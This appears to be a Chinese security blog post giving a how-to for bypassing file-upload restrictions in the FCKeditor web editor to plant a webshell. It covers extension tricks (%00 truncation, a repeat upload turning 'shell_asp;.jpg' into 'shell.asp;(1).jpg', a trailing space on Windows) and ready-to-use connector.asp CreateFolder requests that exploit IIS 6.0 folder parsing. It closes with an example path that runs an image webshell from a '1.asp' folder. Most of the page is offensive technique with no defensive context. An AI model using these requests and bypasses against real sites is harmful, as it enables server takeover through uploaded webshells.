003-FCKeditor 突破上传

# FCKeditor 突破上传

**上传限制**

上传限制的突破方式很多,主要还是抓包改扩展名,%00截断,添加文件头等

**文件名限制**

**二次上传绕过**

文件名`‘ . ’ `修改为`‘ _ ’`

FCK在上传了诸如`shell.asp;.jpg`的文件后,会自动将文件名改为`shell_asp;.jpg`。可以继续上传同名文件,文件名会变为`shell.asp;(1).jpg`

提交**shell.php+空格绕过**

提交**shell.php+空格绕过**

空格只支持windows系统,linux系统是不支持的,可提交**shell.php+空格**来绕过文件名限制。

**iis6.0突破文件夹限制**

“`bash
Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
“`

**文件解析限制**

通过Fckeditor编辑器在文件上传页面中,创建诸如1.asp文件夹,然后再到该文件夹下上传一个图片的webshell文件,获取其shell。

`http://url/images/upload/201806/image/1.asp/1.jpg`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容